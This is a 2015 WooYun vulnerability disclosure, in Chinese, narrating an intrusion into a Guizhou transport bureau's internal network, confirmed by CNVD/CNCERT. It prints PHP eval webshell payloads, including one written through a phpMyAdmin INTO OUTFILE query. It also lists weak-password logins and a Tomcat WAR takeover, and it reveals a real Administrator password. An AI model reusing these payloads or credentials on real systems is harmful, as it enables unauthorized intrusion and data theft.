漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0102878
漏洞标题:贵州交通局内网可被成功漫游
相关厂商:贵州某部门
漏洞作者: wilson
提交时间:2015-03-21 21:19
修复时间:2015-05-10 08:22
公开时间:2015-05-10 08:22
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开
简要描述:
一次简单的内网渗透
详细说明:
一)好久没有动了,和朋友一起玩玩
www.gzjjzd.gov.cn
直接日 搞不定
扫描一下端口
看到这个:
www.gzjjzd.gov.cn:5333/PMS2_0/?q=user/password
Drupal的注入
教程:drops.wooyun.org/papers/3197
尝试payload
爆出路径:/var/www/PMS2_0/
成功进一个 用户名为:owned,密码是thanks的管理员
后台getshell:
教程:qqhack8.blog.163.com/blog/static/11414798520149225199423/
这样可以执行php代码了
如何直接写shell吧
<?php $a="<?php eval($"."_POST[xxs);?>";fputs(fopen("./shell.php","w"),$a);?>
看了看phpinfo()
发现貌似做了端口映射,本机的ip是:192.168.3.206
--------------------========------------------------
二)开始内网遨游
2.1密码收集:
Mysql:
2.2sscoket 进内网
安装ssocket进内网,教程看着这里:
www.freebuf.com/articles/system/12182.html
好了,开始内网遨游~
这里不急着提权root,看看mysql的密码能不能进root
ok 运气不错 进去了
2.3扫描
端口扫描加扫描一下弱口令:
发现一个smb 弱口令和 mongodb的弱口令
想办法执行192.168.3.136的命令:
用pyinstaller给psexec.py 转化为二进制的形式 再linux上面执行
但是发现卡着不动了,没成功执行命令。不知道是不是因为win2008的的什么条件设定了?
2.4内网的web渗透
继续看看有没有别web的好玩东西,由于内网管理员防范意识明显减低了~
开始手工测试弱口令~
One:
192.168.3.74 好像是什么voip电话
admin:admin 进去了
Two:
192.168.3.30/Login.htm
admin:12345 进去了
其实也就是这个:
www.gzjjzd.gov.cn:5000/Login.htm
貌似是一个交通摄像头 可惜加载不出画面。。
There:
192.168.3.95:8080/index.php?lang=en-iso-8859-1&convcharset=iso-8859-1 phpmyadmin
root:123456 弱口令~
爆出路径:
192.168.3.95:8080/index.php?lang[]=1
SELECT '<?php phpinfo();eval($_POST[a]);?>' INTO OUTFILE 'D:\\host\\phpMyAdmin\\libraries\\test2.php'
ok 成功getshell
再通过 php代理脚本去用菜刀连接内网中的服务器192.168.3.95:
ok~
并找到mssql数据库配置文件,许多数据泄露。。
但是用菜刀不能执行命令?上传大马来提权吧
发现有360提权失败
继续找别的玩玩
Four:
192.168.3.62:99/OAapp/WebObjects/OAapp.woa/wo/com.oa8000.proj.root.Main/W04Vk6bo9HbblLGR3zRrlM/4.14
user:123456 可以进入
华天动力oa 默认密码
www.wooyun.org/bugs/wooyun-2010-072735
默认账号admin/htoa登陆tomcat后台
直接部署一个war getshell
system权限
读密码:
UserName: Administrator
LogonDomain: GZKL-9DE8D3523D
password: 10623777
全程无脱库,只为刷rank。求不抓
漏洞证明:
修复方案:
版权声明:转载请注明来源 wilson@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-03-26 08:21
厂商回复:
CNVD确认并复现所述情况(测试第一层风险),已经转由CNCERT下发给贵州分中心,同时同步向交通部通报中心通报.
最新状态:
暂无